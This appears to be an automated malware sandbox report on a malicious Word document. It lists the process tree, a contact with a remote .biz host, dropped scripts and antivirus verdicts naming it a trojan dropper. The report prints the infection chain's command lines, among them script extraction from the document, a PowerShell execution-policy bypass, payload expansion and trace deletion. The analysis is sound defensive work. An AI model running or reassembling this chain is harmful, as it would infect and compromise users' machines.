Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | July 31, 2021, 1:50 p.m. | July 31, 2021, 1:52 p.m. |
-
WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office15\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc
212-
cmd.exe cmd /c cd /d %USERPROFILE% && type "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" | findstr /r "^var" > y.js && wscript y.js "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc"
624-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" "
1532 -
findstr.exe findstr /r "^var"
1940 -
wscript.exe wscript y.js "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc"
2196-
cmd.exe "C:\Windows\System32\cmd.exe" /c findstr /r "^dHJ5I" "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" > temp.txt
1868-
findstr.exe findstr /r "^dHJ5I" "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc"
1748
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c findstr /r "^QWRkL" "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" > temp.txt
2368-
findstr.exe findstr /r "^QWRkL" "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc"
2824
-
-
wscript.exe "C:\Windows\System32\wscript.exe" yy.js
2872 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -f ./y.ps1
2064-
csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\jt6a_ory.cmdline"
1784-
cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES32BA.tmp" "c:\Users\test22\AppData\Local\Temp\CSC32AA.tmp"
1964
-
-
cmd.exe cmd /c expand C:\Users\test22\AppData\Local\Temp\tmp3394.tmp -F:* C:\Users\test22\AppData\Local\Temp && del /q /f *.tmp
460-
expand.exe expand C:\Users\test22\AppData\Local\Temp\tmp3394.tmp -F:* C:\Users\test22\AppData\Local\Temp
1512
-
-
cmd.exe cmd /c cd /d %USERPROFILE% && del /f /q y.*
2236
-
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
romanovawillkillyou.c1.biz | 185.176.43.106 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
UDP 192.168.56.103:57684 -> 164.124.101.2:53 | 2027863 | ET INFO Observed DNS Query to .biz TLD | Potentially Bad Traffic |
UDP 192.168.56.103:57684 -> 8.8.8.8:53 | 2027863 | ET INFO Observed DNS Query to .biz TLD | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
request | GET http://romanovawillkillyou.c1.biz/index.php?user_id=417 |
file | C:\Users\test22\AppData\Local\Temp\~$866ae254de4cabd60a95abcc52c315.doc |
file | C:\Users\test22\yy.js |
file | c:\Users\test22\AppData\Local\Temp\jt6a_ory.dll |
file | C:\Users\test22\y.ps1 |
file | C:\Users\test22\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\cmd.exe" /c findstr /r "^dHJ5I" "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" > temp.txt |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" " |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -f ./y.ps1 |
cmdline | "C:\Windows\System32\cmd.exe" /c findstr /r "^QWRkL" "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" > temp.txt |
cmdline | powershell.exe -ep bypass -f ./y.ps1 |
file | C:\Users\test22\AppData\Local\Temp\jt6a_ory.dll |
Data received | ! |
Data received | HTTP/1.1 403 Forbidden Date: Sat, 31 Jul 2021 04:50:48 GMT Server: Apache Vary: Host Last-Modified: Wed, 19 Sep 2012 23:44:43 GMT ETag: "6e-4ca169747d0c0" Accept-Ranges: bytes Content-Length: 110 Connection: close Content-Type: text/html <html><head><meta http-equiv="refresh" content="0;http://biz.nf/errors/403.html" /></head><body></body></html> |
Data sent | ! |
Data sent | GET /index.php?user_id=417 HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Host: romanovawillkillyou.c1.biz Connection: Keep-Alive |
cmdline | cmd /c cd /d %USERPROFILE% && del /f /q y.* |
cmdline | cmd /c expand C:\Users\test22\AppData\Local\Temp\tmp3394.tmp -F:* C:\Users\test22\AppData\Local\Temp && del /q /f *.tmp |
cmdline | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\jt6a_ory.cmdline" |
Lionic | Trojan.MSOffice.SDrop.b!c |
Elastic | malicious (high confidence) |
ALYac | Trojan.Downloader.DOC.Gen |
Symantec | Trojan.Gen.2 |
ESET-NOD32 | a variant of Generik.JKVCGVL |
TrendMicro-HouseCall | TROJ_FRS.VSNTGU21 |
Avast | Other:Malware-gen [Trj] |
Kaspersky | HEUR:Trojan-Dropper.MSOffice.SDrop.gen |
NANO-Antivirus | Trojan.Ole2.Vbs-heuristic.druvzi |
ViRobot | DOC.Z.Agent.895425 |
DrWeb | W97M.Dropper.106 |
TrendMicro | TROJ_FRS.VSNTGU21 |
McAfee-GW-Edition | BehavesLike.OLE2.Downloader.cl |
Ikarus | Trojan.SuspectCRC |
Microsoft | Trojan:Script/Woreflint.A!cl |
TACHYON | Suspicious/W97M.Obfus.Gen.8 |
SentinelOne | Static AI - Malicious OLE |
Fortinet | VBA/Agent.JKV!tr |
AVG | Other:Malware-gen [Trj] |
parent_process | winword.exe | martian_process | cmd /c cd /d %USERPROFILE% && type "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" | findstr /r "^var" > y.js && wscript y.js "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" | ||||||
parent_process | powershell.exe | martian_process | cmd /c cd /d %USERPROFILE% && del /f /q y.* | ||||||
parent_process | powershell.exe | martian_process | cmd /c expand C:\Users\test22\AppData\Local\Temp\tmp3394.tmp -F:* C:\Users\test22\AppData\Local\Temp && del /q /f *.tmp |
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c findstr /r "^dHJ5I" "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" > temp.txt | ||||||
parent_process | wscript.exe | martian_process | cmd /c findstr /r "^dHJ5I" "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" > temp.txt | ||||||
parent_process | wscript.exe | martian_process | powershell.exe -ep bypass -f ./y.ps1 | ||||||
parent_process | wscript.exe | martian_process | cmd /c findstr /r "^QWRkL" "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" > temp.txt | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\wscript.exe" yy.js | ||||||
parent_process | wscript.exe | martian_process | wscript.exe yy.js | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -f ./y.ps1 | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c findstr /r "^QWRkL" "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" > temp.txt | ||||||
parent_process | winword.exe | martian_process | cmd /c cd /d %USERPROFILE% && type "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" | findstr /r "^var" > y.js && wscript y.js "C:\Users\test22\AppData\Local\Temp\ce866ae254de4cabd60a95abcc52c315.doc" | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\jt6a_ory.cmdline" | ||||||
parent_process | powershell.exe | martian_process | cmd /c cd /d %USERPROFILE% && del /f /q y.* | ||||||
parent_process | powershell.exe | martian_process | cmd /c expand C:\Users\test22\AppData\Local\Temp\tmp3394.tmp -F:* C:\Users\test22\AppData\Local\Temp && del /q /f *.tmp |
option | -ep bypass | value | Attempts to bypass execution policy | ||||||
option | -ep bypass | value | Attempts to bypass execution policy |
file | C:\Windows\SysWOW64\wscript.exe |
file | C:\Windows\System32\cmd.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |